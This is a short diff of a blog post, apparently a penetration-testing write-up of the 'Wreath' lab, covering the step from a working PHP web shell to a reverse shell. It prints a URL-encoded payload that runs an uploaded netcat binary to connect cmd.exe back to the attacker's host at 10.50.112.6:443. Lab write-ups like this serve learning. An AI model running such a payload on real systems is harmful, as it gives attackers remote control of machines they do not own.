SoumyaEXE/soumya.github.io/_posts/2021-03-30-Wreath-Writeup.markdown

 ![](/reports/Wreath/image63.png)

 And the php web shell works!
 The next step is to get a reverse shell.
 After identifying the target as a 64 bit machine by using systeminfo, I uploaded a 64bit netcat binary[[12]](#ftnt12) and called it 0xd4y-nc.exe.
 I then set up an HTTP server on my local box with python and downloaded the binary onto the system with curl.
-To get a reverse shell, I used a simple nc reverse shell payload: powershell.exe%20C:\\xampp\\htdocs\\resources\\uploads\\0xd4y-nc.exe%2010.50.112.6%20443%20-e%20cmd.exe
+To get a reverse shell, I used a simple nc reverse shell payload\: powershell.exe%20C\:\\xampp\\htdocs\\resources\\uploads\\0xd4y-nc.exe%2010.50.112.6%20443%20-e%20cmd.exe

 ![](/reports/Wreath/image30.png)